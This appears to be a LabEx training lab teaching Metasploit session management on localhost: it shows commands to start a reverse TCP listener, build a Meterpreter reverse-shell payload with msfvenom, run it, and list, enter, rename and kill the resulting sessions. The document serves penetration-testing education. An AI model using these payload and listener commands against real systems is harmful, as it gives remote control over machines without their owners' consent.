LabEx
Log InJoin Free

Manage Multiple Sessions in Metasploit

Kali LinuxBeginner
Practice Now

Introduction

In penetration testing, it's common to gain access to multiple systems simultaneously. The Metasploit Framework provides a powerful way to manage these connections, which are known as "sessions." A session is an active link to a compromised target, which could be a command-line shell or an advanced Meterpreter session.

Effectively managing these sessions is a critical skill. It allows you to organize your workflow, switch between targets seamlessly, and maintain control over your compromised assets. In this lab, you will learn the fundamental commands for managing multiple sessions in Metasploit. You will practice gaining sessions, listing them, interacting with specific ones, renaming them for better organization, and finally, terminating them cleanly.

Gain multiple Meterpreter or shell sessions

In this step, you will set up a listener in Metasploit and then execute a payload to create two separate Meterpreter sessions. This simulates gaining access to two different systems.

First, open a terminal and start the Metasploit Framework console. The -q flag makes it start quietly, without showing the banner.

msfconsole -q

Next, we will configure a generic listener, called multi/handler, to wait for incoming connections.

use multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444

Now, run the listener as a background job using the -j flag. This keeps the msfconsole prompt available for other commands while the listener runs in the background.

run -j

You should see a confirmation that the handler has started.

[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 127.0.0.1:4444

Now, you need to generate and execute the payload that will connect back to this listener. Open a new, second terminal tab by clicking the + icon in the terminal window.

In this new terminal, use msfvenom to create a payload. This command generates an ELF executable file that, when run, will connect back to our listener.

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o ~/project/payload.elf

Make the generated payload file executable:

chmod +x ~/project/payload.elf

Now, execute the payload twice to create two sessions. We run them as background processes (&) so you can run the command again immediately.

./payload.elf &
./payload.elf &

Switch back to your first terminal window with msfconsole. You will see messages indicating that two Meterpreter sessions have been opened.

[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:38998) at 2023-10-27 10:30:00 -0400
[*] Meterpreter session 2 opened (127.0.0.1:4444 -> 127.0.0.1:39000) at 2023-10-27 10:30:05 -0400

You have now successfully established two active sessions.

List all active sessions with the sessions command

In this step, you will learn how to view all the active sessions you have established. With multiple sessions open, you need a way to list them to see what you're connected to.

The sessions command is used for this purpose. In your msfconsole terminal, simply type sessions to get a list of all active sessions. The -l flag is an alias for list and does the same thing.

sessions

The output will be a table containing information about each session:

Active sessions
===============

  Id  Name  Type                   Information              Connection
  --  ----  ----                   -----------              ----------
  1         meterpreter x64/linux  uid=1000, gid=1000, ...  127.0.0.1:4444 -> 127.0.0.1:38998 (...)
  2         meterpreter x64/linux  uid=1000, gid=1000, ...  127.0.0.1:4444 -> 127.0.0.1:39000 (...)

This table provides a clear overview:

  • Id: A unique number for each session, used to interact with it.
  • Name: A custom name for the session (currently empty).
  • Type: The type of session (e.g., meterpreter, shell).
  • Information: Details about the compromised system, like user ID.
  • Connection: The source and destination IP addresses and ports.

Interact with a specific session using sessions -i

In this step, you will learn how to select and interact with a specific session from the list.

Once you have identified the session you want to work with, you can use the sessions command with the -i (interact) flag followed by the session ID.

Let's interact with the first session (ID 1).

sessions -i 1

Your command prompt will change from msf6 > to meterpreter >, indicating that you are now inside the Meterpreter session and can run Meterpreter-specific commands.

[*] Starting interaction with 1...

meterpreter >

To confirm you are in the session, run a simple command like sysinfo to get system information from the target.

sysinfo

You will see output similar to this:

Computer     : labex-virtual-machine
OS           : Ubuntu 22.04 (Linux 5.15.0-78-generic)
Architecture : x64
System Language: en_US
Meterpreter  : x64/linux

After you are done working within a session, you can return to the main msfconsole prompt without terminating the session. To do this, use the background command.

background

This will put the session in the background and return you to the msf6 > prompt, allowing you to manage other sessions.

[*] Backgrounding session 1...
msf6 exploit(multi/handler) >

Rename a session for better organization using sessions -n

In this step, you will learn how to rename a session. When managing many sessions, the default names are not descriptive. Renaming sessions with meaningful labels (e.g., "WebServer", "DBServer") makes them much easier to identify.

You can rename a session using the sessions command with the -n (name) flag. The syntax is sessions -n <NewName> <ID>.

Let's rename session 2 to something more descriptive, like TestHost.

sessions -n TestHost 2

Metasploit will confirm that the session has been renamed.

[*] Session 2's name has been changed to TestHost.

Now, list the sessions again to see the change.

sessions

The output table will now show the new name in the "Name" column for session 2.

Active sessions
===============

  Id  Name      Type                   Information              Connection
  --  ----      ----                   -----------              ----------
  1             meterpreter x64/linux  uid=1000, gid=1000, ...  127.0.0.1:4444 -> 127.0.0.1:38998 (...)
  2   TestHost  meterpreter x64/linux  uid=1000, gid=1000, ...  127.0.0.1:4444 -> 127.0.0.1:39000 (...)

This makes it much easier to track your targets.

Terminate a session using sessions -k

In this step, you will learn how to terminate a session. Once you have finished your work on a target system or if a session is no longer needed, it's good practice to close it.

To terminate, or kill, a session, use the sessions command with the -k (kill) flag, followed by the session ID.

Let's terminate session 1.

sessions -k 1

Metasploit will confirm that it is stopping the session.

[*] Stopping session 1...
[*] 127.0.0.1 - Meterpreter session 1 closed.  Reason: User exit

To verify that the session has been terminated, list the active sessions one more time.

sessions

The output will now only show the remaining session, TestHost.

Active sessions
===============

  Id  Name      Type                   Information              Connection
  --  ----      ----                   -----------              ----------
  2   TestHost  meterpreter x64/linux  uid=1000, gid=1000, ...  127.0.0.1:4444 -> 127.0.0.1:39000 (...)

You have successfully cleaned up the unnecessary session.

Summary

Congratulations on completing this lab! You have learned the essential skills for managing multiple sessions within the Metasploit Framework.

In this lab, you practiced:

  • Creating multiple Meterpreter sessions using a multi/handler and a payload.
  • Listing all active sessions with the sessions command.
  • Interacting with a specific session using sessions -i <ID>.
  • Renaming a session for better organization with sessions -n <Name> <ID>.
  • Terminating a session cleanly using sessions -k <ID>.

Mastering these commands is fundamental for any penetration tester, as it allows for efficient and organized control over multiple compromised systems.

Related Kali Linux Courses
Kali Linux for Beginners

Kali Linux for Beginners

cybersecuritykalilinux
Kali Server Exploitation in Action

Kali Server Exploitation in Action

cybersecuritykalilinux